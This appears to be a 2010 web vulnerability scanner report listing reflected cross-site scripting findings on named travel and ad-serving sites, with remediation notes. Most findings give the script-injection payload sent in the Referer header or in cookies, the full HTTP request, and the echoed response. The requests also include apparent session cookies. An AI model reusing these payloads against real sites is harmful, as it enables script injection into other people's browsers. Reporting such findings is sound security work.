<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b66"><script>alert(1)</script>acd21509cda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that used client-side technologies such as Flash to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ads/ads HTTP/1.1
Host: www.tumri.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0B7BA190F3D67986CD1922911185CBC8; C=-18871661|2094410516; t_opt=OPT-OUT;
Referer: http://www.google.com/search?hl=en&q=15b66"><script>alert(1)</script>acd21509cda
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Dec 12 15:46:07 UTC 2010
Content-Length: 1432
Date: Sun, 12 Dec 2010 15:46:06 GMT
Connection: close
<html><head>
</head><body onclick="" > <!-- Host:web28-us.dc1--> <!-- error serving banner ad : Product/Targeting error during ad request--> <form method="POST" target="_blank" action="http://ats.tu ...[SNIP]... <input type="hidden" name="PublisherURL" value="http://www.google.com/search?hl=en&q=15b66"><script>alert(1)</script>acd21509cda"/> ...[SNIP]...
The value of the tyrg1st cookie is copied into an HTML comment. The payload c6b23--><script>alert(1)</script>f5f5afc855f was submitted in the tyrg1st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /mystuff/ShowCreateAccount.do HTTP/1.1
Host: travel.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T0042007014101212094421020188304057814; Service=Travelocity; JSESSIONID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274c6b23--><script>alert(1)</script>f5f5afc855f; intentmedia_user_id=8f13f3ec-a554-4082-b332-38c3d456e131; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; AIR=returningDate=01/02/2011&flightType=roundtrip&children=0&airlineSearchPref=&classOfService=ECONOMY&leavingDate=12/26/2010&minorsAge0=0&dateTypeSelect=exactDates&dateLeavingTime=Anytime&lowestFare=705&leavingFrom=HOU&seniors=0&fareType=all&adults=1&dateReturningTime=Anytime&minorsAge1=0&goingTo=SFO&minorsAge2=0&minorsAge3=0&minorsAge4=0; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 16:01:48 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 51782
<!-- Copyright (C) 2005 Travelocity.com L.P. All rights reserved --> <script type="text/javascript" src="https://a248.e.akamai.net/f/248/5879/1h/i.travelpn.com/10.12/js/global.js"></script> <timer:tim ...[SNIP]... <!-- JSESSIONID = D97A419890F94FF6FEEE1A7CB80C0B53.p0608 TPSESSIONID = T0042007014101212094421020188304057814 Service = TRAVELOCITY TYRG1ST = 4D682B341EE14274c6b23--><script>alert(1)</script>f5f5afc855f --> ...[SNIP]...
The value of the Apache cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5eeb'-alert(1)-'88d4cc2516e was submitted in the Apache cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dealssearch HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUwb5eeb'-alert(1)-'88d4cc2516e; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. - ...[SNIP]... = false ; var isCarPage = false ; var isCruisePage = false ;
var mediamath = 'http://pixel.mathtag.com/event/js?mt_id=10372&v1=&v2=&v3=&s1=rnneEg-AAABLINUrNs-33-VrVYUwb5eeb'-alert(1)-'88d4cc2516e&s2=30-v87vYjYhHjO3Qb8anwYb&s3='; var showBlueKai = true;
The value of the p1.med.st cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fdb"-alert(1)-"7414981a4c2 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels84fdb"-alert(1)-"7414981a4c2; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. ...[SNIP]... <script language="JavaScript" type="text/javascript"> var R9StartPage = new Date(); var isSuppressLogin = false; var StartTab = "hotels84fdb"-alert(1)-"7414981a4c2"; CMP2REQUIREDEST=true; </script> ...[SNIP]...
The value of the p1.med.st cookie is copied into the HTML document as plain text between tags. The payload 8aef2<script>alert(1)</script>0c2bbb02b3e was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels8aef2<script>alert(1)</script>0c2bbb02b3e; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14b5"><script>alert(1)</script>1a9667087ef was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelsb14b5"><script>alert(1)</script>1a9667087ef; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31a6d"><script>alert(1)</script>770106d9556 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels31a6d"><script>alert(1)</script>770106d9556; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b5"-alert(1)-"abb999a98f3 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /out HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelse17b5"-alert(1)-"abb999a98f3; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. ...[SNIP]... <script language="JavaScript" type="text/javascript"> var R9StartPage = new Date(); var isSuppressLogin = false; var StartTab = "hotelse17b5"-alert(1)-"abb999a98f3"; CMP2REQUIREDEST=true; </script> ...[SNIP]...
The value of the p1.med.st cookie is copied into the HTML document as plain text between tags. The payload fac7b<script>alert(1)</script>c232d97e3d2 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelsfac7b<script>alert(1)</script>c232d97e3d2; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;